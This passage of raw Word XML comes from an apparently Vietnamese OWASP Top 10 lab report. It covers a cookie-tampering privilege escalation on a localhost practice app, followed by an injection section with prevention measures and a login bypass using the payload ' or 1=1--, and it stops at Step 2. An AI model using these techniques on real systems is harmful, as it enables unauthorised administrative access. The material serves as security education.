      <w:r w:rsidR="00724CB8" w:rsidRPr="001A177E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t xml:space="preserve">Thực hiện đăng nhập với thông tin người dùng ( </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>P@$$w0rd</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00815B03">
        <w:t xml:space="preserve"> ) thì thông tin User được lưu giữ trong cookies như hình bên dưới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A99D552" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="001A177E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FE4E235" wp14:editId="6AC7028A">
            <wp:extent cx="6115050" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="118624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4088" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1981200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A998F6C" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRPr="001A177E" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A177E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A177E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="001A177E">
        <w:t>User|2024-03-19 15:38:38.783153</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401FD38A" w14:textId="4C9006B7" w:rsidR="00724CB8" w:rsidRDefault="00815B03" w:rsidP="00724CB8">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00135DCA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00135DCA">
        <w:t xml:space="preserve">hận thấy có User ở cookie, nên ta sẽ thử thay đổi “User” </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00135DCA">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00135DCA">
        <w:t xml:space="preserve"> “admin”. </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:t xml:space="preserve"> Tức là, </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A177E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A177E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:t>“admin</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="001A177E">
        <w:t>|2024-03-19 15:38:38.783153</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20031C8B" w14:textId="4013534E" w:rsidR="00724CB8" w:rsidRPr="00815B03" w:rsidRDefault="00724CB8" w:rsidP="00815B03">
      <w:r w:rsidRPr="00815B03">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t xml:space="preserve"> Lúc này thoát ra, </w:t>
      </w:r>
      <w:r w:rsidR="00815B03" w:rsidRPr="00815B03">
        <w:t xml:space="preserve">sau đó </w:t>
      </w:r>
      <w:r w:rsidRPr="00815B03">
        <w:t xml:space="preserve">vào lại thì đã được tự động đăng nhập được với quyền admin, như sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326AB7F2" w14:textId="77777777" w:rsidR="00724CB8" w:rsidRPr="00135DCA" w:rsidRDefault="00724CB8" w:rsidP="00724CB8">
      <w:r w:rsidRPr="00135DCA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FB94890" wp14:editId="3221B3D3">
            <wp:extent cx="6115050" cy="2442210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1862819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19935" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2442210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BFBA0" w14:textId="169D910D" w:rsidR="001F070A" w:rsidRPr="001F070A" w:rsidRDefault="009D0400" w:rsidP="001F070A">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidR="001F070A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00815B03" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve">High (cao) vì </w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="00FA486A">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="001F070A">
        <w:t>ỗ hổng này có thể cho phép kẻ tấn công truy cập trái phép vào hệ thống với quyền admin</w:t>
      </w:r>
      <w:r w:rsidR="00FA486A" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> thông qua việc chiếm lấy và chỉnh sửa cookie</w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="001F070A">
        <w:t>, gây ra nguy cơ rò rỉ thông tin nhạy cảm và chiếm quyền kiểm soát hệ thống</w:t>
      </w:r>
      <w:r w:rsidR="001F070A" w:rsidRPr="00FA486A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E78BB7" w14:textId="5BFCEBB3" w:rsidR="009D0400" w:rsidRPr="00FA486A" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidR="00724CB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00724CB8" w:rsidRPr="00FA486A">
        <w:t>Thực hiện việc kiểm tra và xử lý thông tin từ các file liên quan đến cookie bằng cách sử dụng một hệ thống lọc đầu vào.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADDD21" w14:textId="0BCE7191" w:rsidR="00151DDF" w:rsidRPr="00955E98" w:rsidRDefault="00151DDF" w:rsidP="00151DDF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc182909836"/>
      <w:r w:rsidRPr="00955E98">
        <w:lastRenderedPageBreak/>
        <w:t>A03:2021 – Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="00E4114E" w14:textId="51C2B735" w:rsidR="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc182909837"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Mô tả lỗ hổng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="52C2C51A" w14:textId="0BD5F7F7" w:rsidR="005D0569" w:rsidRPr="00FA486A" w:rsidRDefault="001A7605" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t>Một ứng dụng có khả năng bị tấn công tiêm khi dữ liệu ng</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t>ời dùng cung cấp không đ</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve">ợc xác thực hoặc lọc bởi ứng dụng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878972E" w14:textId="5AF6DC58" w:rsidR="00151DDF" w:rsidRPr="00FA486A" w:rsidRDefault="001A7605" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t>Tuỳ theo kiểu tiêm thì mã tấn công có thể khác nhau và tuỳ chỉnh theo cấu trúc của ứng dụng muốn tấn công, một số kiểu tiêm phổ biến nh</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ư</w:t>
      </w:r>
      <w:r w:rsidR="005D0569" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> SQL injection, NoSQL injection, OS command injection, Object Relational Mapping(ORM) injection, LDAP injection, và Expression Language (EL) injection hoặc Object Graph Navigation Library (OGNL) injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A621ED" w14:textId="7A36A405" w:rsidR="00AE7C29" w:rsidRDefault="00AE7C29" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc182909838"/>
      <w:r>
        <w:t xml:space="preserve">Biện pháp </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26">
        <w:t>ngăn chặn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="677046AC" w14:textId="24F51F53" w:rsidR="00940383" w:rsidRPr="001A7605" w:rsidRDefault="00940383" w:rsidP="001A7605">
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Giữ dữ liệu tách biệt khỏi các lệnh và truy vấn.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> Sử dụng các API an toàn như PreparedStatement trong Java để thực hiện truy vấn SQL với tham số hóa, đảm bảo rằng dữ liệu người dùng không thể thao tác trực tiếp lên truy vấn SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C624D8A" w14:textId="3BBA0076" w:rsidR="00940383" w:rsidRPr="001A7605" w:rsidRDefault="00940383" w:rsidP="001A7605">
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Sử dụng API an toàn hoặc chuyển sang công cụ Object Relational Mapping (ORMs).</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> ORM như Hibernate trong Java giúp tự động hóa và bảo vệ truy vấn SQL bằng cách sử dụng tham số hóa và tránh viết truy vấn SQL thủ công, giúp giảm thiểu nguy cơ SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E5CD87" w14:textId="3666C88A" w:rsidR="00940383" w:rsidRPr="001A7605" w:rsidRDefault="00940383" w:rsidP="001A7605">
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Sử dụng kiểm tra đầu vào phía server với danh sách cho phép (allowlist).</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> Chỉ cho phép các ký tự hợp lệ trong các trường đầu vào, chẳng hạn như chỉ cho phép chữ và số trong trường tên người dùng, ngăn chặn nhập các ký tự đặc biệt có thể gây hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BBA241" w14:textId="17137199" w:rsidR="00940383" w:rsidRPr="001A7605" w:rsidRDefault="00940383" w:rsidP="001A7605">
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Escape các ký tự đặc biệt trong truy vấn động.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve">Nếu phải sử dụng truy vấn động, </w:t>
      </w:r>
      <w:r w:rsidR="00FA486A" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve">thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t>escape các ký tự đặc biệt như dấu nháy đơn (') hoặc dấu nháy kép (") bằng cách sử dụng các hàm cụ thể của ngôn ngữ lập trình hoặc thư viện hỗ trợ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65352EE1" w14:textId="79AE3C16" w:rsidR="00AE7C29" w:rsidRPr="001A7605" w:rsidRDefault="00940383" w:rsidP="001A7605">
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Sử dụng LIMIT và SQL controls khác để ngăn chặn tiết lộ hàng loạt dữ liệu.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ví dụ:</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7605">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t>Sử dụng LIMIT 10 trong truy vấn để giới hạn số hàng trả về, ngay cả khi truy vấn bị SQL injection, kẻ tấn công cũng không thể lấy được toàn bộ dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554CA23E" w14:textId="77777777" w:rsidR="00151DDF" w:rsidRPr="00151DDF" w:rsidRDefault="00151DDF" w:rsidP="00F41059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc182909839"/>
      <w:r w:rsidRPr="00151DDF">
        <w:t>Kịch bản tấn công thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="0857CACE" w14:textId="2DD89C38" w:rsidR="00031203" w:rsidRDefault="00031203" w:rsidP="00031203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc182909840"/>
      <w:r w:rsidRPr="00031203">
        <w:t>Bài thực hành – Lab 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="6FCCCC32" w14:textId="11AC7DA4" w:rsidR="004E0865" w:rsidRDefault="004E0865" w:rsidP="004E0865">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E0865">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="00EF59B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/injection_sql_lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70251BC0" w14:textId="75894DB1" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C8158E">
        <w:t>Injection</w:t>
      </w:r>
      <w:r w:rsidR="004E0865">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439BE72A" w14:textId="7D87ABBD" w:rsidR="009D0400" w:rsidRPr="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0400">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t>Thực hiện truy cập thông qua việc việc truyền câu lệnh SQL vào (giống SQLi).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0008FA" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359BE4DA" w14:textId="29D381E7" w:rsidR="009D0400" w:rsidRDefault="00FA486A" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00726430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="00FA486A">
        <w:t>ruy cập và task, thực hiện đăng nhập vs thông tin đăng nhập bất kỳ và có thể thấy được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7445B" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00726430" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00726430">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F39502C" wp14:editId="14C58679">
            <wp:extent cx="6115050" cy="2005330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="203788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8828" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2005330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F623A4" w14:textId="21607666" w:rsidR="009D0400" w:rsidRPr="00FA486A" w:rsidRDefault="009D0400" w:rsidP="00FA486A">
      <w:r w:rsidRPr="00FA486A">
        <w:t>Điều này gợi ý rằng</w:t>
      </w:r>
      <w:r w:rsidR="00FA486A" w:rsidRPr="00FA486A">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t xml:space="preserve">đăng nhập với quyền admin. </w:t>
      </w:r>
      <w:r w:rsidR="00FA486A" w:rsidRPr="00FA486A">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:t>ìm hiểu và sử dụng kĩ thuật SQL Injection cho task này, bằng cách đăng nhập với:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C1F01F" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00726430" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00726430">
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00726430">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00726430">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2588CF" w14:textId="77777777" w:rsidR="009D0400" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00726430">
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00726430">
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘ or 1=1--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFE6C35" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00907DBD" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Giải thích:</w:t>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>‘ or 1=1--</w:t>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:t xml:space="preserve"> là một chuỗi được chèn vào trường password nhằm mục đích làm cho câu truy vấn SQL trở thành một điều kiện luôn trả về đúng. Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489DC3B" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00907DBD" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:t xml:space="preserve"> dấu nháy đơn kết thúc (đóng) giá trị chuỗi của password được truyền vào trước đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D2BF5D" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00907DBD" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>or 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:t xml:space="preserve"> tạo ra một điều kiện luôn đúng, vì "1=1" luôn là mệnh đề đúng trong SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B043D69" w14:textId="77777777" w:rsidR="009D0400" w:rsidRPr="00907DBD" w:rsidRDefault="009D0400" w:rsidP="009D0400">
      <w:r w:rsidRPr="00FA486A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00907DBD">
        <w:t xml:space="preserve"> là cách bắt đầu của một chú thích trong SQL, làm cho mọi thứ sau nó trở thành bất kỳ mã nào trong chú thích và sẽ không được thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB4AAD5" w14:textId="12EFF52D" w:rsidR="009D0400" w:rsidRPr="00907DBD" w:rsidRDefault="00FA486A" w:rsidP="009D0400">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="009D0400" w:rsidRPr="001A7605">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
